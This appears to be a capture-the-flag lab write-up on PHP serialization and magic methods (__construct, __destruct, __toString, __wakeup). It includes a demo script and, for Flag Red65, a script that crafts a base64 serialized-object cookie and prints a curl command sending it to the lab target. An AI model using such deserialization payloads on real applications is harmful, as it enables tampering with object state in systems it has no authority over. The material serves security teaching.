
IP Address: 172.25.200.200
Port: 9047
Would you like to run the target Docker image locally?
sudo docker run -d --restart always -p 9047:80 --name Flag-red65-67 joshbeck2024/ctf-php-serialization-part-2-flag-red65
- Object serialization in PHP (serialize()) is the process of converting an object into a storable or transmittable format, a string, so it can be saved in a file, sent over a network, stored in a database, or placed in a cookie. Later, the object can be reconstructed by deserializing it (unserialize()), restoring its class, state and properties. This is useful for maintaining object state across sessions or during communication between systems, and it is also the point where untrusted input is turned back into live objects.
Lab Objective:
- In Part 1, we looked at the structure of a serialized object and what happens when a data structure is serialized/deserialized.
- In this lab, we'll tackle 3 flags that are designed to introduce the concept of 'Magic Methods.'
- If you know when and under what conditions these special ‘Magic Methods’ are triggered, it makes a huge difference when participating in CTF challenges or conducting real-world static code analysis.
In PHP, Magic Methods are special functions that are automatically triggered by certain events rather than being called manually by your code.
- You can recognize them (in PHP) because they always start with a double underscore (e.g., __construct, __destruct, and __toString).
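The three methods above, plus __wakeup(), are the ones that matter for this lab, so here is an added example (not part of the lab's own code) that makes the trigger conditions visible. The Demo class and its property names are made up for illustration; run it with `php demo.php` and watch the order of the printed lines.

```php
<?php
// Added example: which magic methods fire, and when.
// 'Demo' and its 'color' property are placeholders for this demonstration.
class Demo {
    public $color;

    // Runs only when PHP builds the object with `new`.
    public function __construct($color) {
        $this->color = $color;
        echo "__construct: new Demo('$color')\n";
    }

    // Runs when unserialize() rebuilds the object; __construct does NOT run then.
    // (On PHP 7.4+, an __unserialize() method, if defined, takes precedence over __wakeup().)
    public function __wakeup() {
        echo "__wakeup: unserialize() restored color='{$this->color}'\n";
    }

    // Runs whenever the object is used where a string is expected.
    public function __toString() {
        echo "__toString: object used in string context\n";
        return "Demo(color={$this->color})";
    }

    // Runs when the last reference to the object disappears, or at script shutdown.
    public function __destruct() {
        echo "__destruct: color='{$this->color}'\n";
    }
}

echo "-- new --\n";
$a = new Demo('red');                 // __construct fires here

echo "-- serialize --\n";
$s = serialize($a);                   // nothing fires (no __sleep defined)
echo $s, "\n";                        // O:4:"Demo":1:{s:5:"color";s:3:"red";}

echo "-- unserialize --\n";
$b = unserialize($s);                 // __wakeup fires; __construct is skipped

echo "-- string context --\n";
echo "as string: " . $b . "\n";       // __toString fires because of the concatenation

echo "-- unset --\n";
unset($a);                            // refcount of $a's object hits 0: __destruct fires now

echo "-- end of script --\n";         // $b's __destruct fires after this line, at shutdown
```

The point for Flag Red65 is the unserialize step: a constructor is never a safety check against attacker-supplied serialized data, because unserialize() bypasses it entirely. The unset() step is the "reference check" behaviour Flag Red66 builds on: __destruct runs as soon as no variable references the object, which can be long before the script ends.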
Lab summary:
Flag Red65: We'll look at the __construct() method and determine the conditions under which it is triggered.
Flag Red66: We'll look at the __destruct() method and learn about reference checks (when the last reference to an object goes away).
Flag Red67: We'll look at the __toString() method and determine the conditions under which it is triggered.
Flag Red65:

The Challenge:
- Super Easy, but hopefully informative this time:
- Hand the application a base64-encoded cookie containing a serialized object with s:5:"color";s:12:"give_me_flag";
- This syntax should make sense to you after working through Part 1.
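As an added example (not the lab's own solution), the script below builds that cookie two ways: by hand, using the s:length:"value"; rule from Part 1, and with serialize(), then checks that both agree before base64-encoding. The class name Flag and the cookie name data are assumptions; take the real ones from the target's source, since unserialize() only rebuilds the properties of the class named in the payload.

```php
<?php
// Added example: craft the Flag Red65 cookie payload.
// ASSUMPTIONS: class 'Flag' and cookie name 'data' are placeholders;
// the target at 172.25.200.200:9047 is the one given on the page.
class Flag {
    public $color;
}

// 1) Hand-built, following the O:/s: grammar from Part 1.
//    Each s:N: prefix is the byte length of the value, so compute it with strlen().
$class = 'Flag';
$prop  = 'color';
$value = 'give_me_flag';
$hand  = sprintf('O:%d:"%s":1:{s:%d:"%s";s:%d:"%s";}',
                 strlen($class), $class,
                 strlen($prop),  $prop,
                 strlen($value), $value);

// 2) Generated by PHP itself.
$o = new Flag();
$o->color = $value;
$gen = serialize($o);

// Both must produce exactly: O:4:"Flag":1:{s:5:"color";s:12:"give_me_flag";}
if ($hand !== $gen) {
    fwrite(STDERR, "mismatch:\n  $hand\n  $gen\n");
    exit(1);
}

// 3) Sanity check the round trip before sending it anywhere.
$back = unserialize($gen);
if (!($back instanceof Flag) || $back->color !== 'give_me_flag') {
    fwrite(STDERR, "round trip failed\n");
    exit(1);
}

// 4) Encode for the cookie. base64 can contain '=', so the cookie value is quoted.
$cookie = base64_encode($gen);
echo "serialized: $gen\n";
echo "cookie:     $cookie\n";
echo "curl -s -b 'data=$cookie' http://172.25.200.200:9047/\n";
```

If the application's class has more than one property, or the property is private or protected, the hand-built string changes (the property count after the class name, and the "\0Class\0prop" / "\0*\0prop" name mangling); generating the payload with serialize() against a copy of the class avoids getting those details wrong.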
